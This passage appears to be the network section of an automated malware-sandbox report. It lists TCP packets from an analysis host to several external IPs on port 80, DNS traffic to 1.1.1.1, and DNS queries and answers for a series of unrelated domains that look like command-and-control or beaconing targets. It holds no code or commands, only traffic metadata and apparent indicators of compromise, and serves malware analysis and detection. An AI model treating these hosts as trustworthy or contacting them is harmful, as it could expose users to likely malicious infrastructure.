                                                                                    Jan 8, 2025 14:59:51.425590038 CET4991980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:51.427485943 CET4991980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:51.432317019 CET8049919116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:52.317792892 CET8049919116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:52.317858934 CET8049919116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:52.317928076 CET4991980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:52.929342985 CET4991980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:53.948178053 CET4993980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:53.953073025 CET8049939116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:53.953152895 CET4993980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:53.955218077 CET4993980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:53.960038900 CET8049939116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:54.832896948 CET8049939116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:54.833004951 CET8049939116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:54.833098888 CET4993980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:55.460802078 CET4993980192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:56.485636950 CET4995180192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:56.688033104 CET8049951116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:56.688123941 CET4995180192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:56.691610098 CET4995180192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:56.696438074 CET8049951116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:56.696559906 CET8049951116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:57.561166048 CET8049951116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:57.561247110 CET8049951116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:57.561305046 CET4995180192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:58.195374966 CET4995180192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:59.213253021 CET4996780192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:59.218044043 CET8049967116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 14:59:59.221133947 CET4996780192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:59.222978115 CET4996780192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 14:59:59.227755070 CET8049967116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 15:00:00.101052999 CET8049967116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 15:00:00.101113081 CET8049967116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 15:00:00.101207018 CET4996780192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 15:00:00.103982925 CET4996780192.168.2.5116.50.37.244
                                                                                    Jan 8, 2025 15:00:00.108736038 CET8049967116.50.37.244192.168.2.5
                                                                                    Jan 8, 2025 15:00:13.374954939 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:13.379929066 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:13.380021095 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:13.381917000 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:13.386723995 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:14.898461103 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:14.903359890 CET804998185.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:14.903418064 CET4998180192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:15.916745901 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:15.921565056 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:15.921683073 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:15.923553944 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:15.928355932 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:17.429411888 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:17.434988976 CET804998285.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:17.435085058 CET4998280192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:18.448041916 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:18.454493999 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:18.455152035 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:18.457041979 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:18.461775064 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:18.461919069 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:19.961376905 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:19.966311932 CET804998385.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:19.966357946 CET4998380192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:20.979340076 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:20.984150887 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:00:20.985658884 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:20.987472057 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:00:20.992263079 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:01:21.691230059 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:01:21.691327095 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:01:21.693296909 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:01:21.702280998 CET4998480192.168.2.585.159.66.93
                                                                                    Jan 8, 2025 15:01:21.707108974 CET804998485.159.66.93192.168.2.5
                                                                                    Jan 8, 2025 15:01:26.771163940 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:26.776036024 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:26.776143074 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:26.778004885 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:26.782841921 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:27.421096087 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:27.421422958 CET804998591.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:27.421529055 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:28.288933992 CET4998580192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:29.307539940 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:29.312356949 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:29.313487053 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:29.317349911 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:29.322227955 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:29.958038092 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:29.958131075 CET804998691.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:29.958174944 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:30.820164919 CET4998680192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.841662884 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.846541882 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:31.849509954 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.853368998 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:31.858154058 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:31.858321905 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494259119 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494318008 CET804998791.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:32.494376898 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:33.369528055 CET4998780192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.386677027 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.391836882 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:34.391937971 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.394099951 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:34.398906946 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281248093 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281266928 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281281948 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281358957 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281388998 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281404972 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281416893 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281435013 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281450987 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281539917 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281580925 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.281714916 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281728029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.281734943 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.282486916 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.286946058 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.286959887 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.287082911 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414719105 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414747953 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414845943 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414858103 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414868116 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414880991 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414891958 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414894104 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.414928913 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.414993048 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.415575981 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415600061 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415611029 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.415936947 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:35.416064978 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.419531107 CET4998880192.168.2.591.195.240.94
                                                                                    Jan 8, 2025 15:01:35.424335957 CET804998891.195.240.94192.168.2.5
                                                                                    Jan 8, 2025 15:01:48.662784100 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.667642117 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:48.667712927 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.669852018 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:48.674659014 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.268565893 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.268652916 CET804998966.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:49.273348093 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:50.179919004 CET4998980192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.198304892 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.203191042 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.203294039 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.207081079 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:51.211877108 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824213982 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824342012 CET804999066.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:51.824453115 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:52.715481043 CET4999080192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.729782104 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.734672070 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:53.735512972 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.737837076 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:53.742662907 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:53.742762089 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347150087 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347244024 CET804999166.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:54.347294092 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:55.243392944 CET4999180192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.263375998 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.268235922 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.268322945 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.270982981 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.275825977 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879038095 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879199028 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:01:56.879254103 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.882761955 CET4999280192.168.2.566.29.149.46
                                                                                    Jan 8, 2025 15:01:56.887562037 CET804999266.29.149.46192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.068433046 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.073283911 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.073390961 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.103715897 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:02.108539104 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.765703917 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.766114950 CET8049993195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:02.766172886 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:03.617110968 CET4999380192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.636272907 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.641143084 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:04.641325951 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.643358946 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:04.648211956 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370394945 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370618105 CET8049994195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:05.370712042 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:06.148329973 CET4999480192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.166941881 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.171873093 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.175551891 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.179446936 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:07.184242010 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.184381962 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.852940083 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.852979898 CET8049995195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:07.855540037 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:08.679645061 CET4999580192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.699443102 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.704289913 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:09.704370022 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.706173897 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:09.711020947 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386743069 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386780024 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:10.386888027 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:10.391499043 CET4999680192.168.2.5195.110.124.133
                                                                                    Jan 8, 2025 15:02:10.396276951 CET8049996195.110.124.133192.168.2.5
                                                                                    Jan 8, 2025 15:02:31.956394911 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.961236954 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:31.962671995 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.965532064 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:31.970365047 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541184902 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541253090 CET8049997217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:32.541306973 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:33.478759050 CET4999780192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.495908976 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.501071930 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:34.501148939 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.503525972 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:34.508346081 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.059575081 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.059726954 CET8049998217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:35.061806917 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:36.008080006 CET4999880192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.027542114 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.032399893 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.037743092 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.037743092 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:37.042550087 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.042687893 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.636917114 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.637227058 CET8049999217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:37.639584064 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:38.539042950 CET4999980192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.559560061 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.564407110 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:39.564527988 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.566620111 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:39.571362019 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141056061 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141217947 CET8050000217.196.55.202192.168.2.5
                                                                                    Jan 8, 2025 15:02:40.141268015 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:40.144610882 CET5000080192.168.2.5217.196.55.202
                                                                                    Jan 8, 2025 15:02:40.149411917 CET8050000217.196.55.202192.168.2.5

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 8, 2025 14:59:26.580765009 CET5449853192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 14:59:26.992649078 CET53544981.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 14:59:42.949146986 CET5778753192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 14:59:42.958199978 CET53577871.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 14:59:51.058226109 CET4985253192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 14:59:51.418337107 CET53498521.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:00:05.192431927 CET6191053192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:00:05.201582909 CET53619101.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:00:13.277163029 CET5728553192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:00:13.372420073 CET53572851.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:01:26.714411020 CET5059953192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:01:26.768699884 CET53505991.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:01:40.434226990 CET6315053192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:01:40.443769932 CET53631501.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:01:48.495985031 CET5705453192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:01:48.659955978 CET53570541.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:01.950717926 CET5850353192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:02.050198078 CET53585031.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:15.402115107 CET5182053192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:15.436481953 CET53518201.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:23.496021032 CET5200153192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:23.847479105 CET53520011.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:31.901767969 CET5727353192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:31.953454971 CET53572731.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:45.155566931 CET5003053192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:45.371803999 CET53500301.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:02:53.433801889 CET5491553192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:02:53.442931890 CET53549151.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:03:01.558661938 CET5474653192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:03:02.556132078 CET5474653192.168.2.51.1.1.1
                                                                                    Jan 8, 2025 15:03:02.604357004 CET53547461.1.1.1192.168.2.5
                                                                                    Jan 8, 2025 15:03:02.607907057 CET53547461.1.1.1192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 8, 2025 14:59:26.580765009 CET192.168.2.51.1.1.10x8b25Standard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 14:59:42.949146986 CET192.168.2.51.1.1.10x5e02Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 14:59:51.058226109 CET192.168.2.51.1.1.10x7860Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:05.192431927 CET192.168.2.51.1.1.10xd92Standard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:13.277163029 CET192.168.2.51.1.1.10x9104Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:01:26.714411020 CET192.168.2.51.1.1.10xce56Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:01:40.434226990 CET192.168.2.51.1.1.10xa944Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:01:48.495985031 CET192.168.2.51.1.1.10x76c9Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:01.950717926 CET192.168.2.51.1.1.10xb719Standard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:15.402115107 CET192.168.2.51.1.1.10xd8b7Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:23.496021032 CET192.168.2.51.1.1.10xc7a1Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:31.901767969 CET192.168.2.51.1.1.10x4046Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:45.155566931 CET192.168.2.51.1.1.10x48b0Standard query (0)www.joyesi.xyzA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:02:53.433801889 CET192.168.2.51.1.1.10xb899Standard query (0)www.k9vyp11no3.cfdA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:01.558661938 CET192.168.2.51.1.1.10x1157Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:03:02.556132078 CET192.168.2.51.1.1.10x1157Standard query (0)www.shenzhoucui.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 8, 2025 14:59:26.992649078 CET1.1.1.1192.168.2.50x8b25No error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 14:59:42.958199978 CET1.1.1.1192.168.2.50x5e02Name error (3)www.kasegitai.tokyononenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 14:59:51.418337107 CET1.1.1.1192.168.2.50x7860No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:05.201582909 CET1.1.1.1192.168.2.50xd92Name error (3)www.antonio-vivaldi.mobinonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:13.372420073 CET1.1.1.1192.168.2.50x9104No error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:13.372420073 CET1.1.1.1192.168.2.50x9104No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Jan 8, 2025 15:00:13.372420073 CET1.1.1.1192.168.2.50x9104No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
